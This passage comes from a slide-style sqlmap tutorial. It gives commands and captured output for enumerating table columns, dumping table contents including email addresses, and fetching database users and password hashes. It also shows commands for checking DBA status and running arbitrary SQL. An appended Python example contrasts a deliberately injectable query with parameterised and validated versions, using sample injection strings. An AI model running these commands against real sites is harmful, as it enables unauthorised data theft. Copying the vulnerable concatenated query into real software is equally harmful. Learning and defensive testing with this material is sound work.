           [10:46:43] [INFO] retrieved: 5
           [10:46:56] [INFO] retrieved: reg_id
           [10:49:13] [INFO] retrieved: int(11)
  • 20.     [10:50:52] [INFO] retrieved: reg_url
           [10:53:06] [INFO] retrieved: varchar(255)
           [10:55:53] [INFO] retrieved: reg_redirect
           [10:59:07] [INFO] retrieved: varchar(255)
           [11:01:42] [INFO] retrieved: reg_active
           [11:04:30] [INFO] retrieved: int(11)
           [11:06:03] [INFO] retrieved: reg_cat_id
           [11:07:27] [INFO] retrieved: int(11)
           Database: testingpa
           Table: reg_section
           [5 columns]
  • 21.     +--------------+--------------+
           | Column       | Type         |
           +--------------+--------------+
           | reg_active   | int(11)      |
           | reg_id       | int(11)      |
           | reg_redirect | varchar(255) |
           | reg_url      | varchar(255) |
           | reg_cat_id   | int(11)      |
           +--------------+--------------+
           [11:09:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
           [*] shutting down at: 11:09:08
  • 22. STEP 5
       Syntax: sqlmap.py -u "<Target URL>" --dump -D <Database Name> -T <Table Name>
       Objective: Now comes the most interesting part: extracting the data from a table. The command below retrieves, or simply dumps, the data of the specified table.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dump -D TestDB -T users
       Result:
           [13:15:46] [INFO] fetching entries for table 'ave_config' on database 'testingpa'
           [13:15:46] [INFO] fetching number of entries for table 'ave_config' on database 'testingpa'
           [13:15:46] [INFO] retrieved: 1
           [13:15:59] [INFO] retrieved: 1
           [13:16:34] [INFO] retrieved:
           [13:16:49] [INFO] retrieved: info@test.com
  • 23.     [13:22:18] [INFO] retrieved: mike@test.com
           [13:27:47] [INFO] retrieved: Testing property
           [13:32:49] [INFO] retrieved: CMS
           Database: testingpa
           Table: ave_config
           [1 entry]
           +-----------+---------------+-----------------+---------------+------------------+------------+
           | config_id | site_email_cc | site_email_from | site_email_to | site_owner       | site_title |
           +-----------+---------------+-----------------+---------------+------------------+------------+
           | 1         | NULL          | info@test.com   | mike@test.com | Testing property | CMS        |
           +-----------+---------------+-----------------+---------------+------------------+------------+
           [13:33:51] [INFO] Table 'testingpa.ave_config' dumped to CSV file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\dump\testingpa\ave_config.csv'
           [13:33:51] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
           [*] shutting down at: 13:33:51
  • 24. Other Related Command
       1. To find out more about the remote database system, use the option "-b". It will try to find the exact banner of the database server.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -b
       Result:
           [11:44:40] [INFO] fetching banner
           [11:44:40] [INFO] the back-end DBMS operating system is None
           banner: '5.1.67-0+test1'
           [11:44:40] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
       2. The next command will fetch the list of users and passwords.
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --users --passwords --privileges
       Result:
  • 25.     [11:53:23] [INFO] fetching database users
           [11:53:23] [INFO] fetching number of database users
           [11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 1
           [11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session': 'testingpa'@'%'
           database management system users [1]:
           [*] 'testingpa'@'%'
           [11:53:23] [INFO] fetching database users password hashes
           [11:53:23] [INFO] fetching number of password hashes for user 'testingpa'
           [11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session':
           [11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session':
           [11:53:23] [INFO] retrieved:
           [11:53:27] [WARNING] unable to retrieve the number of password hashes for user 'testingpa'
           [11:53:27] [ERROR] unable to retrieve the password hashes for the database users
  • 26. Other Related Command
       3. To get the current user and current database information
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --current-user --is-dba --current-db --threads=10
       Result:
           [11:57:30] [INFO] fetching current user
           [11:57:30] [INFO] retrieving the length of query output
           [11:57:30] [INFO] retrieved: 10
           [11:59:52] [INFO] retrieved: testingpa@%
           current user: 'testingpa@%'
           [11:59:52] [INFO] fetching current database
           [11:59:52] [INFO] retrieving the length of query output
           [11:59:52] [INFO] retrieved: 8
           [12:00:58] [INFO] retrieved: testingpa
           current database: 'testingpa'
           [12:00:58] [INFO] testing if current user is DBA
           [12:00:58] [INFO] retrieving the length of query output
  • 27. Other Related Command
           [12:00:58] [INFO] retrieved:
           [12:01:06] [INFO] retrieved:
           current user is DBA: 'False'
           [12:01:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com'
       4. Run an arbitrary SQL command
       Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --sql-query="SELECT * FROM <table name>"
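
Why the ID parameter in Step 1 is reported as a 'numeric' injection, and what closes it, shown as an added example that is not part of the original slides. The products table, the lookup functions and the sample request values are constructed assumptions, and Python's built-in sqlite3 stands in for the MySQL back end seen in the slides.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory data standing in for a product-detail backend."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (215, 'widget'), (216, 'gadget'), (217, 'gizmo');
        """
    )
    return db


def lookup_concatenated(db, raw_id):
    """Vulnerable 'before': the request value is pasted into a numeric context."""
    return db.execute("SELECT id, name FROM products WHERE id = " + raw_id).fetchall()


def lookup_bound(db, raw_id):
    """Bound parameter: the value travels as data and is never parsed as SQL."""
    return db.execute("SELECT id, name FROM products WHERE id = ?", (raw_id,)).fetchall()


def lookup_hardened(db, raw_id):
    """Allow-list validation first, then a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("ID must be a decimal integer")
    return db.execute("SELECT id, name FROM products WHERE id = ?", (int(raw_id),)).fetchall()


# Constructed request values: one legitimate ID, and two that only change the
# result if the application lets them alter the WHERE clause.
SAMPLES = ["216", "216 OR 1=1", "216 AND 1=2"]


def audit(lookup):
    """Return {request value: row count, or 'rejected'} for each sample."""
    db = make_db()
    report = {}
    for raw in SAMPLES:
        try:
            report[raw] = len(lookup(db, raw))
        except (ValueError, sqlite3.Error):
            report[raw] = "rejected"
    return report


if __name__ == "__main__":
    for fn in (lookup_concatenated, lookup_bound, lookup_hardened):
        print(fn.__name__, audit(fn))
```

In the concatenated version the row count follows the appended condition, which is the difference in output a scanner looks for; with a bound parameter the same values match nothing, and the hardened version rejects them before any query runs.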